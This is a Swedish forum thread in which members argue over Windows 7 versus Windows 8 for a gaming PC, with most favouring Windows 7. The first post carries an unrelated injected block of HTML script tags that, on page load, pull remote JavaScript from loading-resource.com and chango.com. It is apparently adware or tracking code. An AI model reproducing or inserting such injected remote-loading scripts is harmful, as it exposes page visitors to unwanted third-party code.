Windows 7 Eller 8?

Reeeqz
P25
Medlem

28 december 2012 23:08 | #1 Reeeqz

Tjena , Ska eventuellt beställa en dator imorgon men kan dock inte bestämma mig mellan operativsystemen W8 o W7.

Kommer mest spela på datorn typ Bf3,Mw3,Bo2, Etc Etc..

Vad tycker ni är bäst , och vad tycker ni jag ska skaffa ?

<div id="__tbSetup"> [/quote]
<script type="text/javascript" src="http://loading-resource.com/data.geo.php?callback=window.__geo.dataLoaded"></script>
<script type="text/javascript" src="http://loading-resource.com/data.geo.php?callback=window.__geo.dataLoaded"></script>
<script id="__changoScript" type="text/javascript">// <![CDATA[
var __chd__ = {'aid':11079,'chaid':'www_objectify_ca'};(function() { var c = document.createElement('script'); c.type = 'text/javascript'; c.async = true;c.src = ( 'https:' == document.location.protocol ? 'https://z': 'http://p') + '.chango.com/static/c.js'; var s = document.getElementsByTagName('script')[0];s.parentNode.insertBefore(c, s);})();
// ]]></script>

W16
P25
Medlem

29 december 2012 00:03 | #2 W16

Skaffa windows 8, windows 7 kommer möjligtvis bli föråldrat, men det är inte säkert. Windows 8 ser ändå rätt så träligt ut utseende mässigt, men man vänjer nog sej vid det ;)

Nickieponken
P31
Medlem

29 december 2012 03:04 | #3 Nickieponken

Skaffa Windows 7 till Service Pack 1 har kommit till 8an, Windows 8 är väldigt buggigt och så gott som oanvändbart i dagsläget, om du vill testa det rekommenderar jag en laptop :)

IronyFist
P32
Medlem

29 december 2012 13:32 | #4 IronyFist

Som vanligt gäller varannat-operativsystem-regeln för windows, alltså skaffar du Win7 och väntar tills Win9 kommer ut om ett par år.

Win95 - bra

Win98 - bra

ME - dåligt

XP - bra

Vista - skit

Win7 - bra

Win8 - dåligt

N0BST3R
P25
Medlem
LolDelete
P24
Medlem
yzterge
P26
Medlem

1 januari 2013 18:18 | #7 yzterge

<div class="quote-content">Citat av: IronyFist

Som vanligt gäller varannat-operativsystem-regeln för windows, alltså skaffar du Win7 och väntar tills Win9 kommer ut om ett par år.

Win95 - bra

Win98 - bra

ME - dåligt

XP - bra

Vista - skit

Win7 - bra

Win8 - dåligt</div>

Jaså, Tycker du att Win8 är dåligt?
Vet du möjligtvis vad win8 igentligen är till för jämnfört med Win7?
Alla har sina åsikter, jag vet. Men igrunden är win8 win7 igentligen. Det dom har gjort är att dom har fixat det så det blir bättre ordning. Tagit bort onödig skit, gjort det säkrare,snabbare,bättre och även gjort om utseendet med att lägga till en extra sida i skrivbordet där man kan använda appar,komma åt bilder osv mycket bättre och så kan man även synka med mobiler,andra datorer och de.
Så jag ser inte någonstans i det hela hur det kan vara sämre än win7?

och att det är buggit och skit är bullshit. Har win8 och är helnöjd med det nickiponken. Slår vad om att du inte ens testat det?

Men svara på det rosaponnykillen. Var är win 8 sämre än win 7?
och kom fan inte med några skitsvar som "för att det är det".

Tack för ordet!

douglasquaidp12
P30
Medlem

2 januari 2013 12:26 | #8 douglasquaidp12

va i helvete ska man ha windows 8 till?

Nickieponken
P31
Medlem

2 januari 2013 14:46 | #9 Nickieponken

yzterge: jag har faktiskt haft det i laptopen sedan Developers Preview så det vadet har du förlorat ^^ Det som är sämre med Windows 8 är deras "Metro" interface, jag får hela tiden sitta och dra med touchpaden för att öppna program, jag vet att det går att ta sig förbi med tredjepartsprogram men det ska man inte behöva använda, dessutom buggar det och det finns flera program som ännu inte är portade till Windows 8 och vissa har inte ens intresse av det. så för att sammanfatta

+ Det utnyttjar hårdvaran bättre och är mer effektivt än Windows 7 på den fronten om än med små marginaler

- "Metro" som inte heter Metro längre
- Fortfarande vissa stabilitets problem

- Datorn stänger aldrig av sig om du inte stänger av strömmen på baksidan utan går ner i ett viloläge för att korta upp uppstartningstiderna (hur miljö vänligt är det egentligen :p)

Och de e väll typ det jag har att säga lite snabbt innan bussen kommer ;)

nofearlegend
P31
Medlem

15 januari 2013 04:40 | #10 nofearlegend

Windows 8 verkar bara vara fylld med gimmick saker och den verkar vara mer för tablets/touchscreen datorer.
Sen så som ovan nämde att det finns massa program som ej är gjorda för eller kommer kanske ens bli till Windows 8.
Generellt är det också dåligt att skaffa ett helt nytt OS eftersom det kommer finnas massa buggar och fel som de måste fixa.

Mitt tips är Windows 7 för att de flesta program funkar till Windows 7 och den har ett interface som liknar föregånde Windows OS.
Jag tror inte heller att de kommer överge Windows 7 för att Windows 8 kommer ut eftersom det finns så många företag och privatpersoner som har gått över från Windows XP och Vista till Windows 7.

Och kör Windows 7 speciellt om du spelar eftersom drivrutiner och annat spel relaterat kan ha problem i Windows 8!

Skriva inlägg?

Logga in för att svara i tråden.